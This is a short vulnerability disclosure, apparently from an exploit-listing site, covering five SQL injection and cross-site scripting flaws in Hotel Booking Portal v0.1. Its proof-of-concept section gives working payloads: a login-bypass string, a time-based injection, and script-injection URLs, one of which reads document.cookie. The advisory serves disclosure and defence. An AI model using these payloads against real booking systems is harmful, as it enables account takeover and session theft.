Hotel Booking Portal Multiple Eploits

Summary

Hotel Booking Portal suffers from multiple vulnerabilities.

Credit:

The information has been provided by Yakir Wizman.


Details

Vulnerable Systems:
 * Hotel Booking Portal v0.1

1). A vulnerability exists in ‘login.php’ – Allows for ‘SQL injection’ of the ’email’ and ‘password’ POST parameters.
2). A vulnerability exists in ‘searchresults.php’ – Allows for ‘SQL injection’ of the ‘country’ POST parameter.
3). A vulnerability exists in ‘includes/languagebar.php’ – Allows for ‘Cross site scripting’ of the ‘window.location’ js
4). A vulnerability exists in ‘administrator/login.php’ – Allows for ‘Cross site scripting’ of the ‘window.location’ js
5). A vulnerability exists in ‘index.php’ – Allows for ‘Cross site scripting’ of the ‘lang’ GET parameter.

II. PoC EXPLOIT

# 1). POST a form to login.php with the value of:
# email set to : ‘ or ‘1’=’1
# password set to : ‘ or ‘1’=’1
# 2). POST to searchresults.php with the value of ‘country’ set to Armenia’ and sleep(1)=’
# 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=’;</script><script>alert(1);</script><script>
# 4). http://127.0.0.1/hbportal/administrator/login.php?xss=’;</script><script>alert(1);</script><script>
# 5). http://127.0.0.1/hbportal/index.php?lang=’;</script><script>alert(document.cookie);</script><script>

Disclosure Timeline:
Published: 2012-08-13

Categories: Exploits